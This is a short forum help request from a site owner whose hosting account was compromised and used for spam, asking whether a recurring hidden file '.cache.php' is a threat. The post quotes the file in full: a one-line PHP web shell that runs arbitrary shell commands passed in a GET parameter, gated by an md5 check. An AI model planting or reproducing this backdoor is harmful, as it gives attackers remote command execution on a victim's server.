I've received an email from my hosting company that my site was compromised and there are several files that send spam through my account.
One of them was ".cache.php" hidden in the root folder. I've cleaned the files, updated core and plugins to the latest versions, changed ftp passwords but this file keeps popping out after deleting.
Does it mean I'm still compromised or this file is not a threat.
It only contains this:
<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>
Anyone experiencing this?
Thnx
R.
↧
redlik on "Is my site being constantly hacked?"
↧